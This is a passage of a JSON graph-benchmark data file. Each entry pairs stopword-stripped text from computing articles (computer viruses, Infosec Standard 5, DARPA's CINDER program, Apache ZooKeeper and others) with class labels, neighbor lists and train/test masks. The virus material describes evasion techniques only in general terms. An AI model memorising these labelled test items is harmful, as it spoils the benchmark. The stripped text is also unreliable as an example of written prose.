attachments e-mails opening attachments e-mails unknown persons organizations help reduce likelihood contracting virus cases virus designed e-mail appears reputable organization e.g. major bank credit card company boot sector viruses specifically target boot sector and/or master boot record mbr host hard disk drive solid-state drive removable storage media flash drives floppy disks etc. email viruses viruses intentionally rather accidentally uses email system spread virus infected files may accidentally sent email attachments email viruses aware email system functions generally target specific type email system microsoft outlook commonly used harvest email addresses various sources may append copies email sent may generate email messages containing copies attachments order avoid detection users viruses employ different kinds deception old viruses especially dos platform make sure last modified date host file stays file infected virus approach fool antivirus software however especially maintain date cyclic redundancy checks file changes viruses infect files without increasing sizes damaging files accomplish overwriting unused areas executable files called cavity viruses example cih virus chernobyl virus infects portable executable files files many empty gaps virus 1 kb length add size file viruses try avoid detection killing tasks associated antivirus software detect example conficker 2010s computers operating systems grow larger complex old hiding techniques need updated replaced defending computer viruses may demand file system migrate towards detailed explicit permission every kind file access kinds antivirus software employ various techniques counter stealth mechanisms infection occurs recourse clean system unreliable microsoft windows operating systems ntfs file system proprietary leaves antivirus software little alternative send read request windows os files handle requests viruses trick antivirus software intercepting requests operating system os virus hide intercepting request read infected file handling request returning uninfected version file antivirus software interception occur code injection actual operating system files would handle read request thus antivirus software attempting detect virus either given permission read infected file read request served uninfected version file reliable method avoid stealth viruses reboot medium known clear security software used check dormant operating system files security software relies virus signatures employ heuristics security software may also use database file hashes windows os files security software identify altered files request windows installation media replace authentic versions older versions windows file cryptographic hash functions windows os files stored windows—to allow file integrity/authenticity checked—could overwritten system file checker would report altered system files authentic using file hashes scan altered files would always guarantee finding infection modern antivirus programs try find virus-patterns inside ordinary programs scanning so-called virus signatures unfortunately term misleading viruses possess unique signatures way human beings virus signature merely sequence bytes antivirus program looks known part virus better term would search strings different antivirus programs employ different search strings indeed different search methods identifying viruses virus scanner finds pattern file perform checks make sure found virus merely coincidental sequence innocent file notifies user file infected user delete cases clean heal infected file viruses employ techniques make detection means signatures difficult probably impossible viruses modify code infection infected file contains different variant virus one method evading signature detection use simple encryption encipher encode body virus leaving encryption module static cryptographic key cleartext change one infection next case virus consists small decrypting module encrypted copy virus code virus encrypted different key infected file part virus remains constant decrypting module would example appended end case virus scanner directly detect virus using signatures still detect decrypting module still makes indirect detection virus possible since would symmetric keys stored infected host entirely possible decrypt final virus probably required since self-modifying code rarity may reason virus scanners least flag file suspicious old compact way use arithmetic operation like addition subtraction use logical conditions xoring byte virus constant exclusive-or operation repeated decryption suspicious code modify code encryption/decryption may part signature many virus definitions simpler older approach use key encryption consisted operations parameters like incrementing decrementing bitwise rotation arithmetic negation logical viruses called polymorphic viruses employ means encryption inside executable virus encrypted certain events virus scanner disabled updates computer rebooted called cryptovirology said times executable decrypt virus execute hidden runtimes infecting computer sometimes disabling antivirus software polymorphic code first technique posed serious threat virus scanners like regular encrypted viruses polymorphic virus infects files encrypted copy decoded decryption module case polymorphic viruses however decryption module also modified infection well-written polymorphic virus therefore parts remain identical infections making difficult detect directly using signatures antivirus software detect decrypting viruses using emulator statistical pattern analysis encrypted virus body enable polymorphic code virus polymorphic engine also called mutating engine mutation engine somewhere encrypted body see polymorphic code technical detail engines operate viruses employ polymorphic code way constrains mutation rate virus significantly example virus programmed mutate slightly time programmed refrain mutating infects file computer already contains copies virus advantage using slow polymorphic code makes difficult antivirus professionals investigators obtain representative samples virus bait files infected one run typically contain identical similar samples virus make likely detection virus scanner unreliable instances virus may able avoid detection avoid detected emulation viruses rewrite completely time infect new executables viruses utilize technique said metamorphic code enable metamorphism metamorphic engine needed metamorphic virus usually large complex example w32/simile consisted 14,000 lines assembly language code 90 part metamorphic engine software often designed security features prevent unauthorized use system resources many viruses must exploit manipulate security bugs security defects system application software spread infect computers software development strategies produce large numbers bugs generally also produce potential exploitable holes entrances virus order replicate virus must permitted execute code write memory reason many viruses attach executable files may part legitimate programs see code injection user attempts launch infected program virus code may executed simultaneously operating systems use file extensions determine program associations microsoft windows extensions may hidden user default makes possible create file different type appears user example executable may created named picture.png.exe user sees picture.png therefore assumes file digital image likely safe yet opened runs executable client machine vast majority viruses target systems running microsoft windows due microsoft large market share desktop computer users diversity software systems network limits destructive potential viruses malware open-source operating systems linux allow users choose variety desktop environments packaging tools etc. means malicious code targeting systems affect subset users many windows users running set applications enabling viruses rapidly spread among microsoft windows systems targeting exploits large numbers hosts linux unix general always natively prevented normal users making changes operating system environment without permission windows users generally prevented making changes meaning viruses easily gain control entire system windows hosts difference continued partly due widespread use administrator accounts contemporary versions like windows xp 1997 researchers created released virus linux—known bliss bliss however requires user run explicitly infect programs user access modify unlike windows users unix users log administrator root user except install configure software result even user ran virus could harm operating system bliss virus never became widespread remains chiefly research curiosity creator later posted source code usenet allowing researchers see worked many users install antivirus software detect eliminate known viruses computer attempts download run executable file may distributed email attachment usb flash drives example antivirus software blocks known malicious websites attempt install malware antivirus software change underlying capability hosts transmit viruses users must update software regularly patch security vulnerabilities holes antivirus software also needs regularly updated order recognize latest threats malicious hackers individuals always creating new viruses german av-test institute publishes evaluations antivirus software windows android examples microsoft windows anti virus anti-malware software include optional microsoft security essentials windows xp vista windows 7 real-time protection windows malicious software removal tool included windows security updates patch tuesday second tuesday month windows defender optional download case windows xp additionally several capable antivirus software programs available free download internet usually restricted non-commercial use free programs almost good commercial competitors common security vulnerabilities assigned cve ids listed us national vulnerability database secunia psi example software free personal use check pc vulnerable out-of-date software attempt update ransomware phishing scam alerts appear press releases internet crime complaint center noticeboard ransomware virus posts message user screen saying screen system remain locked unusable ransom payment made phishing deception malicious individual pretends friend computer security expert benevolent individual goal convincing targeted individual reveal passwords personal information commonly used preventative measures include timely operating system updates software updates careful internet browsing avoiding shady websites installation trusted software certain browsers flag sites reported google confirmed hosting malware google two common methods antivirus software application uses detect viruses described antivirus software article first far common method virus detection using list virus signature definitions works examining content computer memory random access memory ram boot sectors files stored fixed removable drives hard drives floppy drives usb flash drives comparing files database known virus signatures virus signatures strings code used identify individual viruses virus antivirus designer tries choose unique signature string found legitimate program different antivirus programs use different signatures identify viruses disadvantage detection method users protected viruses detected signatures recent virus definition update protected new viruses see zero-day attack second method find viruses use heuristic algorithm based common virus behaviors method ability detect new viruses antivirus security firms yet define signature also gives rise false positives using signatures false positives disruptive especially commercial environment may lead company instructing staff use company computer system services checked system viruses slow productivity regular workers one may reduce damage done viruses making regular backups data operating systems different media either kept unconnected system time hard drive read-only accessible reasons using different file systems way data lost virus one start using backup hopefully recent backup session optical media like cd dvd closed becomes read-only longer affected virus long virus infected file copied onto cd/dvd likewise operating system bootable cd used start computer installed operating systems become unusable backups removable media must carefully inspected restoration gammima virus example propagates via removable flash drives many websites run antivirus software companies provide free online virus scanning limited cleaning facilities purpose websites sell antivirus products services websites—like google subsidiary virustotal.com—allow users upload one suspicious files scanned checked one antivirus programs one operation additionally several capable antivirus software programs available free download internet usually restricted non-commercial use microsoft offers optional free antivirus utility called microsoft security essentials windows malicious software removal tool updated part regular windows update regime older optional anti-malware malware removal tool windows defender upgraded antivirus product windows 8 viruses disable system restore important windows tools task manager cmd example virus ciadoor many viruses removed rebooting computer entering windows safe mode networking using system tools microsoft safety scanner system restore windows windows xp windows vista windows 7 restore registry critical system files previous checkpoint often virus cause system hang freeze subsequent hard reboot render system restore point day corrupted restore points previous days work provided virus designed corrupt restore files exist previous restore points microsoft system file checker improved windows 7 later used check repair corrupted system files restoring earlier clean virus-free copy entire partition cloned disk disk image backup copy one solution—restoring earlier backup disk image relatively simple usually removes malware may faster disinfecting computer—or reinstalling reconfiguring operating system programs scratch described restoring user preferences reinstalling operating system another approach virus removal may possible recover copies essential user data booting live cd connecting hard drive another computer booting second computer operating system taking great care infect computer executing infected programs original drive original hard drive reformatted os programs installed original media system restored precautions must taken avoid reinfection restored executable files computer networks became widespread viruses spread removable media particularly floppy disks early days personal computer many users regularly exchanged information programs floppies viruses spread infecting programs stored disks others installed disk boot sector ensuring would run user booted computer disk usually inadvertently personal computers era would attempt boot first floppy one left drive floppy disks fell use successful infection strategy boot sector viruses common wild many years traditional computer viruses emerged 1980s driven spread personal computers resultant increase bulletin board system bbs modem use software sharing bulletin board–driven software sharing contributed directly spread trojan horse programs viruses written infect popularly traded software shareware bootleg software equally common vectors viruses bbss viruses increase chances spreading computers infecting files network file system file system accessed computers macro viruses become common since mid-1990s viruses written scripting languages microsoft programs microsoft word microsoft excel spread throughout microsoft office infecting documents spreadsheets since word excel also available mac os could also spread macintosh computers although viruses ability send infected email messages viruses take advantage microsoft outlook component object model com interface old versions microsoft word allow macros replicate additional blank lines two macro viruses simultaneously infect document combination two also self-replicating appear mating two would likely detected virus unique parents virus may also send web address link instant message contacts e.g. friends colleagues e-mail addresses stored infected machine recipient thinking link friend trusted source follows link website virus hosted site may able infect new computer continue propagating viruses spread using cross-site scripting first reported 2002 academically demonstrated 2005 multiple instances cross-site scripting viruses wild exploiting websites myspace samy worm yahoo",
    "neighbors": [
      3072,
      5636,
      10245,
      10756,
      5131,
      9227,
      9233,
      9242,
      8735,
      9761,
      3106,
      9762,
      2084,
      37,
      3620,
      4648,
      4649,
      9256,
      43,
      9771,
      3629,
      46,
      9775,
      6707,
      5173,
      8247,
      10297,
      3643,
      575,
      1088,
      9791,
      10816,
      4165,
      8774,
      9800,
      81,
      4689,
      10835,
      8789,
      2654,
      1632,
      1121,
      5728,
      612,
      4198,
      4710,
      3688,
      6762,
      107,
      2675,
      6261,
      10872,
      5754,
      10875,
      5245,
      1150,
      5246,
      9341,
      5249,
      6786,
      11390,
      5764,
      10372,
      138,
      3724,
      5261,
      6797,
      9356,
      10896,
      1681,
      2193,
      1683,
      7827,
      2709,
      4245,
      9364,
      10392,
      1690,
      3739,
      7834,
      6303,
      5281,
      2213,
      6823,
      7851,
      7855,
      4272,
      10417,
      5300,
      10420,
      7352,
      700,
      3262,
      3774,
      8387,
      4295,
      7368,
      10952,
      4298,
      3789,
      5325,
      719,
      4304,
      1745,
      2257,
      8398,
      10448,
      2262,
      5334,
      6360,
      10457,
      3290,
      4314,
      1245,
      4830,
      2275,
      6373,
      744,
      10477,
      6382,
      1776,
      3320,
      4344,
      2811,
      10492,
      5373,
      5886,
      1279,
      4863,
      5893,
      6921,
      2314,
      3852,
      8976,
      7441,
      8978,
      3347,
      4883,
      2325,
      278,
      790,
      3350,
      9488,
      8474,
      3867,
      4892,
      5404,
      3366,
      8998,
      3368,
      3880,
      7465,
      300,
      8493,
      3887,
      7983,
      823,
      827,
      5435,
      7996,
      10556,
      11068,
      11583,
      3394,
      3395,
      4421,
      8526,
      5457,
      4435,
      4948,
      3413,
      2901,
      858,
      7515,
      4956,
      9053,
      11611,
      3423,
      6496,
      8032,
      11103,
      11108,
      1381,
      3941,
      11621,
      3944,
      2409,
      8040,
      4972,
      877,
      4462,
      8045,
      4464,
      5491,
      9591,
      1914,
      5500,
      8574,
      4479,
      2432,
      9087,
      899,
      7044,
      9607,
      5000,
      1417,
      5002,
      1419,
      9102,
      11152,
      3473,
      3991,
      7066,
      11163,
      412,
      10141,
      9630,
      2975,
      5536,
      10657,
      3496,
      9129,
      10664,
      939,
      9646,
      6065,
      1970,
      4023,
      9145,
      6588,
      10173,
      3520,
      9664,
      7106,
      9154,
      3525,
      8133,
      9160,
      1994,
      2508,
      6092,
      10190,
      10708,
      2005,
      2519,
      3032,
      5591,
      9688,
      988,
      477,
      1504,
      9184,
      3555,
      9187,
      1509,
      5093,
      2027,
      7659,
      11244,
      6129,
      6643,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7740,
    "label": 4,
    "text": "Infosec_Standard_5:infosec standard 5 hmg infosec standard 5 is5 data destruction standard used british government is5 part larger family security standards published cesg referred general infosec standard no.1 is5 similar dod 5220.22-m used usa is5 sets wide range requirements—not technical detail overwriting data also policies processes organisations place ensure media disposed securely is5 also touches risk management accreditation secure reuse disposal media important control organisations handling high-impact data sufficient sanitise media sanitisation also auditable records must kept is5 defines two different levels overwriting regardless level used verification needed ensure overwriting successful apart overwriting methods could used degaussing physical destruction media inexpensive media destruction replacement may cheaper sanitisation followed reuse ata secure erase approved different methods apply different media ranging paper cds mobile phones choice method affects reusability four different outcomes considered stricter requirements apply data stronger protective marking il cases media il4 confidential may handled secure site list x site",
    "neighbors": [
      11172
    ],
    "mask": "Test"
  },
  {
    "node_id": 7741,
    "label": 4,
    "text": "Cyber_Insider_Threat:cyber insider threat cyber insider threat cinder digital threat method 2010 darpa initiated program name cyber insider threat cinder program develop novel approaches detection activities within military-interest networks consistent activities cyber espionage cinder threat unlike vulnerability based attacks action taken initiator based unauthorized access unauthorized objects authorized objects based concept authorized access authorized objects normally occur along subsequent actions within security boundary object action viewed attack normal use analyzed standard ids-ips logging expert systems cinder mission seen unauthorized disclosure data exfiltration realized time resultant cinder case would change object actions related disclosure authorized use authorized object unauthorized use authorized object note initial cinder case controlling agent still seen authorized object based fact security system passed evaluation assurance functionality cyber insider threat continued known issue since mid-1980s following nist material dated march 1994 internal threats shows defined infancy system controls well matched average organization security policy direct result typical user permitted circumvent policy frequent basis administrator unable enforce policy weak access controls detect violation policy weak audit mechanisms even audit mechanisms place daunting volume data produced makes unlikely administrator detect policy violations ongoing research integrity intrusion detection promise fill gap research projects become available products systems remain vulnerable internal threats many prerequisite dimensions cinder activity one primary dimension must always met one system ownership prerequisite principles system ownership information dominance within area object action must part cinder mission cinder action mission dimension resulting case issue distilled one entity one agent one action specific time agent completes action entity agent action owns environment transiting using successful committing specific transaction interrupted least measured monitored owner entity moment time dominance ownership object detect past cinder activity exposure realized one must reconcile object actions exchange transaction two agents measured logged analyze result present concepts one detects current future cinder activity followed path detecting past cinder activity reconciliation data object action application heuristics expert system logic mining models data aggregated building automated logic analysis models proved difficult since insider attack use authorized access authorized objects breaking use use system low assurance low percentage reconciliation always cause system produce far many false positives method acceptable true cinder security solution one main tenet cinder detection become system high assurance high reconciliation controlled owned extent current future cinder actions identified monitored terminated darpa ongoing cyber insider threat cinder program detect insider threats computer systems darpa strategic technology office sto project timed begin around 2010/2011 comparison traditional computer security cinder assumes malicious insiders already access internal network thus attempts detect threat mission analysis behavior rather seeking keep threat government documentation uses analogy tell idea card game poker according ackerman wired impetus program came wikileaks disclosures afghan war documents leak robert gates philosophy information military emphasize access frontline soldiers face mass-leaking cinder type response allows military continue philosophy rather simply cutting access information en masse project started peiter zatko former member l0pht cdc left darpa 2013",
    "neighbors": [
      8135,
      6344,
      7464,
      5589,
      9214,
      7322,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7742,
    "label": 1,
    "text": "Apache_Cayenne:apache cayenne apache cayenne open source persistence framework licensed apache license providing object-relational mapping orm remoting services cayenne binds one database schemas directly java objects managing atomic commit rollbacks sql generation joins sequences cayenne remote object persistence java objects even persisted clients via web services native xml serialization objects persisted non-java clients—such ajax-capable browser cayenne supports database reverse engineering generation well velocity-based class generation engine functions controlled directly cayennemodeler fully functional gui tool xml- annotation-based configuration required entire database schema mapped directly java objects quickly comfort gui-based cayennemodeler things together make cayenne interesting user new enterprise world cayenne supports features including caching complete object query syntax relationship pre-fetching on-demand object relationship faulting object inheritance database auto-detection generic persisted objects importantly cayenne scale virtually project size cayenne started project run objectstyle led andrus adamchik released apache license first release july 2002 early 2006 project moved objectstyle apache software foundation december 2006 promoted top level project apache notable milestones cayenne history include release apache cayenne 3.0 may 2010 release apache cayenne 3.1 fall 2014",
    "neighbors": [
      3080,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      10020,
      3877,
      10661,
      11303,
      5677,
      10413,
      1327,
      7983,
      3763,
      7475,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      9789,
      10173,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      6860,
      10573,
      4944,
      10193,
      1363,
      8408,
      9179,
      7261,
      990,
      479,
      8799,
      865,
      10719,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      1913,
      1018,
      9467,
      3710
    ],
    "mask": "None"
  },
  {
    "node_id": 7743,
    "label": 4,
    "text": "Take-back_system:take-back system take-back system one primary channels waste collection especially e-waste besides municipal sites take-back split take-back retailers usually free dependent upon purchase new product producer take-back systems may apply larger commercial equipment usually rely upgrade new product european example maltesian weee take back system",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7744,
    "label": 3,
    "text": "Slotket:slotket computer hardware terminology slotkets also known slockets short slot socket adapter adapters allow socket-based microprocessors used slot-based motherboards slotkets first created allow use socket 8 pentium pro processors slot 1 motherboards later became popular inserting socket 370 intel celerons slot 1 based motherboards lowered costs computer builders especially dual processor machines high-end motherboards accepting two slot 1 processors usually pentium 2 widely available double-socketed motherboards less expensive socket 370 celerons slotkets remained popular transition period slot socket-based pentium iii processors allowing cpu upgrades existing slot 1 motherboards slotkets never introduced take advantage amd athlon processors transition slot form factor socket form factor today slotkets largely disappeared neither intel amd currently manufacture cpus slot form factors",
    "neighbors": [
      7712,
      10468,
      1260,
      1005,
      3892,
      3798,
      4185
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7745,
    "label": 3,
    "text": "ARM_Cortex-A9:arm cortex-a9 arm cortex-a9 mpcore 32-bit processor core licensed arm holdings implementing armv7-a architecture multicore processor providing 4 cache-coherent cores key features cortex-a9 core arm states tsmc 40g hard macro implementation typically operating 2 ghz single core excluding caches occupies less 1.5 mm designed tsmc 65 nanometer nm generic process clocked speeds 1 ghz consuming less 250 mw per core several system chip soc devices implement cortex-a9 core including",
    "neighbors": [
      6659,
      8196,
      9732,
      11282,
      9235,
      11289,
      1057,
      10277,
      38,
      4139,
      8237,
      9774,
      2097,
      5681,
      8250,
      8253,
      6207,
      7747,
      2635,
      8783,
      10838,
      99,
      8812,
      8815,
      630,
      10361,
      638,
      644,
      7300,
      8842,
      11405,
      146,
      659,
      5267,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      9408,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6926,
      2838,
      5417,
      2862,
      3886,
      7988,
      11062,
      6971,
      1346,
      8003,
      10562,
      6981,
      5963,
      1871,
      1872,
      2383,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      6009,
      8058,
      392,
      6539,
      398,
      1428,
      4508,
      10658,
      2979,
      5028,
      7077,
      9638,
      10675,
      3511,
      4024,
      11200,
      9155,
      456,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      3547,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 7746,
    "label": 7,
    "text": "Project_Kusu:project kusu project kusu open source base designed ground basis platform computing open cluster stack 5 project kusu built objective simplified cluster management operation deployment source kit supports range different linux distributions red hat enterprise linux centos fedora suse linux enterprise server opensuse ubuntu linux addition also standards-based open vendor certified modular hybrid stack transparently integrates open source commercial software single consistent cluster operating environment",
    "neighbors": [
      2834,
      7983,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7747,
    "label": 3,
    "text": "InfoTM:infotm infotm chinese technology company founded 2008 infotm microelectronics co. ltd",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      3117,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      2838,
      5417,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      6009,
      8058,
      392,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 7748,
    "label": 2,
    "text": "PicoBSD:picobsd picobsd single-floppy disk version freebsd one bsd operating system descendants different variations picobsd allows one secure dial-up access small diskless router dial-in server one standard floppy disc runs minimum 386sx cpu ram hard disk required picobsd freely available bsd license main developer andrzej bialecki latest version 0.42 dinesh nair backported picobsd build scripts freebsd 2.2.5 allowing addition binaries dial-up flavor due freebsd 2.2.5 smaller binary executable format flexibility freebsd gives along full source code available one build small installation performing various tasks including picobsd included freebsd source files used embedded system developers create system images used recent versions freebsd located /usr/src/release/picobsd/ freebsd 5 superseded nanobsd framework",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      10761,
      2061,
      9743,
      8725,
      5534,
      1316,
      684,
      4908,
      10926,
      1839,
      7983,
      1718,
      9151,
      9153,
      3651,
      10436,
      9927,
      8395,
      2383,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      9320,
      873,
      9452,
      1776,
      633,
      8316
    ],
    "mask": "None"
  },
  {
    "node_id": 7749,
    "label": 9,
    "text": "Little_b_(programming_language):little b programming language little b domain-specific programming language specifically modeling language designed build modular mathematical models biological systems designed authored aneil mallavarapu little b developed virtual cell program harvard medical school headed mathematician jeremy gunawardena language based lisp meant allow modular programming model biological systems allow flexibility facilitate rapid change required accurately capture complex biological systems language draws techniques artificial intelligence symbolic mathematics provides syntactic conveniences derived object-oriented languages language originally denoted lowercase b distinguishing b predecessor widely used c programming language name eventually changed little b avoid confusion pay homage smalltalk first object-oriented programming language",
    "neighbors": [
      9345,
      8262,
      6502,
      9926,
      11625,
      6797,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7750,
    "label": 7,
    "text": "Apache_ZooKeeper:apache zookeeper apache zookeeper software project apache software foundation essentially service distributed systems offering hierarchical key-value store used provide distributed configuration service synchronization service naming registry large distributed systems zookeeper sub-project hadoop top-level apache project right zookeeper architecture supports high availability redundant services clients thus ask another zookeeper leader first fails answer zookeeper nodes store data hierarchical name space much like file system tree data structure clients read write nodes way shared configuration service zookeeper viewed atomic broadcast system updates totally ordered zookeeper atomic broadcast zab protocol core system zookeeper used companies including yelp rackspace yahoo odnoklassniki reddit netapp solidfire facebook twitter ebay well open source enterprise search systems like solr zookeeper originally developed yahoo streamlining processes running big-data clusters storing status local log files zookeeper servers servers communicate client machines provide information zookeeper developed order fix bugs occurred deploying distributed big-data applications prime features apache zookeeper common terminologies regarding zookeeper architecture services cluster replicated stored set servers called ensemble maintains in-memory database containing entire data tree state well transaction log snapshots stored persistently multiple client applications connect server client maintains tcp connection sends requests heartbeats receives responses watch events monitoring addition client libraries included zookeeper distribution number third-party libraries apache curator kazoo available make using zookeeper easier add additional functionality additional programming languages etc etc",
    "neighbors": [
      6161,
      1047,
      8217,
      8735,
      11303,
      5677,
      9789,
      7742,
      7233,
      7261,
      8799,
      2658,
      8294,
      8810,
      2163,
      6774,
      3705,
      10377,
      8860,
      6338,
      1222,
      4294,
      6860,
      5332,
      8408,
      8425,
      747,
      3819,
      5872,
      3326,
      4358,
      8460,
      1296,
      10526,
      3877,
      1327,
      7983,
      4919,
      1851,
      7485,
      4419,
      7499,
      3920,
      4944,
      6993,
      1363,
      3927,
      4960,
      865,
      11111,
      9078,
      1913,
      910,
      7567,
      11161,
      6555,
      10661,
      5031,
      5047,
      4538,
      6074,
      10683,
      5567,
      9665,
      1991,
      5066,
      8139,
      9179,
      990,
      10719,
      11235,
      3560,
      3561,
      3562,
      5612,
      7159,
      1018,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 7751,
    "label": 3,
    "text": "Industrial_Technology_Research_Institute:industrial technology research institute industrial technology research institute itri technology research development institution taiwan founded 1973 itri played vital role transforming taiwan industries labor-intensive innovation-driven focuses fields smart living quality health sustainable environment years itri incubated 270 innovative companies including well-known names umc tsmc addition headquarters hsinchu taiwan itri branch offices u.s. europe japan effort extend r scope promote opportunities international cooperation around world since founding 1973 itri significant driver taiwan ’ economy especially tech industry 2019 itri banned smartphones computers made china huawei internal network security reasons china ’ taiwan affairs office reacted negatively decision spokesperson saying decision “ jeopardizes mainland taiwan ’ regular economic cooperation political purposes 1973 founding itri 1976 transferring ic manufacturing processes taiwan 1977 establishment first ic demonstration foundry taiwan foundation nation semiconductor industry 1980 origination umc spinoff itri 1983 development ibm-compatible pc leading prosperity industry 1985 innovating carbon fiber bicycles giant bicycles 1986 unveiling photoresist dry film 1987 creation tsmc world largest oem ic foundry spinoff itri 1987 establishment national measurement laboratory nml 1989 creation mirle automation corp. spinoff itri 1990 establishment taiwan notebook pc consortium 1990 development 3-inch tft-lcd displays breakthrough large size display r 1991 introduction taiwan first fire explosion laboratory 1993 establishment 8-inch wafer laboratory accelerated upgrading semiconductor industry 1993 commencement manufacturing 8-inch silicon wafers securing taiwan place semiconductor manufacturing powerhouse 1995 development first common car engine establishment automobile engine enterprise cec 1995 becoming world third-largest wire cutting machine producer 1995 breaking barrier taiwan cd-rom industry 1996 establishment epistar corp. complete supply chain led industry 1996 launching openlab project 1997 innovation first inkjet printing head taiwan 1999 establishment emergency response information center 2001 development first linear motor machine tool taiwan 2002 institution phalanx biotech group spinoff itri 2002 discovery type 21 human collagen 2002 introduction cgmp chinese herbal medicinal plant 2004 establishment delsolar co. joint venture delta electronics itri 2005 establishment itri southern region campus 2007 opening taiwan first flexible display production development laboratory 2008 building first wimax applications lab world 2009 introduction world first usb 3.0 thin memory card 2009 setting first solar power lab taiwan 2010 designing pavilion dreams taipei international flora exposition integration applied sciences arts focus humanism 2010 establishing asia first three-dimensional integrated circuit 3d ic r laboratory new milestone taiwan ic chip technology 2011 launch new venture capital industrial technology investment corporation itic mitsubishi ufj capital mucap 2011 initiating green campus program promoting sustainable living lab green technologies 2011 building taiwan first led ergonomic lighting laboratory assist led industry developing high-value products 2012 signing mou energy research center netherlands develop green energy applications 2012 signing mou kosbi korea promotion bilateral smes economic development 2012 establishing commercialization advisory committee cac promote venture capitals startups 2013 signing memorandum cooperation pact vtt technical research centre finland marking first step innovation-oriented r cooperation taiwan finland 2013 creation itri techventure club foster entrepreneurship taiwan high-tech industries 2013 building itri central taiwan innovation campus drive industrial development central taiwan 2014 partnership laser source companies taiwan japan golden asia fund ventures 2014 granting taiwan mitsui chemicals exclusive license manufacture sell stoba 2015 launching new machine tools technology center forge cnc industry clusters 2015 formulation taiwan innovation entrepreneurship center tiec silicon valley linking taiwan startups global chain technology innovations 2015 receiving underwriters laboratories ul witness test data program certification ensuring itri fuel cell testing lab asia first ul-certified lab 2015 creation smart microsystems technology center laser additive manufacturing technology center bolster iot 3d printing 2016 launch golden asia fund ii industrial technology investment corporation itic itri mitsubishi ufj capital mucap enhance bilateral cooperation taiwan japan 2016 inauguration innovation campus strengthen academia-industry ties 2017 launch itri-aist r collaboration space 2017 opening itri guangfu innovation campus 2018 establishment taiwan-merck biopharma r training collaboration program itri guangfu innovation campus 2018 signing mou malaysian investment development authority mida build industrial technology demonstration site malaysia 2018 establishment industry science technology international strategy center 2019 self driving cars designed itri accumulated 2,000km testing changhua coastal industrial park starfab tech accelerator founded itri focusing innovation fields smart manufacturing smart medical care smart finance smart agriculture headquartered taipei office tainan science park see honors information order recognize outstanding individuals contributions technology advancement industrial development betterment humankind itri inaugurated honorary itri laureates",
    "neighbors": [
      10303
    ],
    "mask": "None"
  },
  {
    "node_id": 7752,
    "label": 5,
    "text": "Demand_priority:demand priority demand priority media-access method used 100basevg 100 megabit per second mbit/s ethernet implementation proposed hewlett-packard hp microelectronics later standardized ieee 802.12 demand priority shifts network access control workstation hub access method works star topology method node wishes transmit indicates wish hub also requests high- regular-priority service transmission obtains permission node begins transmitting hub hub responsible passing transmission destination node hub responsible providing access network hub pass high priority transmissions immediately pass regular-priority transmissions opportunity arises letting hub manage access architecture able guarantee required bandwidths requested service priority particular applications nodes also guarantee network scaled enlarged without loss bandwidth demand priority helps increase bandwidth following ways node need keep checking whether network idle transmitting current ethernet implementations wire pair dedicated task making network checking unnecessary demand priority frees wire pair fortunate 100basevg specifications use quartet signalling needs four available wire pairs heavy traffic effectively bring standard ethernet networks standstill nodes spend time trying access network demand priority hub needs pass transmission destination overall network traffic decreased means bandwidth available heavy network traffic",
    "neighbors": [
      5384,
      5490
    ],
    "mask": "None"
  },
  {
    "node_id": 7753,
    "label": 8,
    "text": "Service-oriented_architecture_implementation_framework:service-oriented architecture implementation framework service-oriented architectures soa based notion software services high-level software components include web services implementation soa requires tools well run-time infrastructure software collectively referred service-oriented architecture implementation framework soaif soaif envisions comprehensive framework provides technology enterprise might need build run soa soaif includes design-time run-time capabilities well software functionality enterprise needs build operate soa including service-oriented vendors race provide possible solutions three different approaches emerging integrating disparate heterogeneous information systems enterprise implementation frameworks meet requirements loosely coupled coarse grained asynchronous services packaged enterprise applications perform well streamlining processes related standard tasks however performance rapidly deteriorates automating streamlining customized processes encompass multiple enterprise applications process difficult time-consuming expensive implement maintain soaif infrastructure addresses issue allowing definition process network topology spanning multiple enterprise boundaries accomplished via peer-to-peer messaging infrastructure distributed security mechanisms allow efficient data exchanges easy implementation enabling enterprise enforce security policies allows soaif increase operational efficiency across entire value chain soa works standard protocols existing packaged application integration solutions complex require significant implementation effort often including extensive manual coding deployment purposes soaif provides native support run time deployment services across network dramatically reduces overall costs application integration deployment automating time-consuming processes also allows extension integration across business boundaries traditional software development process translating requirements working distributed systems time-consuming difficult requiring several stages manual development deployment complex error-prone task effectively streamlined using higher-level component-based soaif soaif incorporates tools let processes developed using standards business process execution language bpel easily translated distributed high-level services easier develop manipulate debug services easily composed implementation-level data flows without user developer track complex middleware concepts topics queues implementation-level services run machine across network virtue built-in dynamic deployment support soaif provides combination service-oriented tools built-in support distributed debugging run-time tracing logging dynamic deployment allows soaif 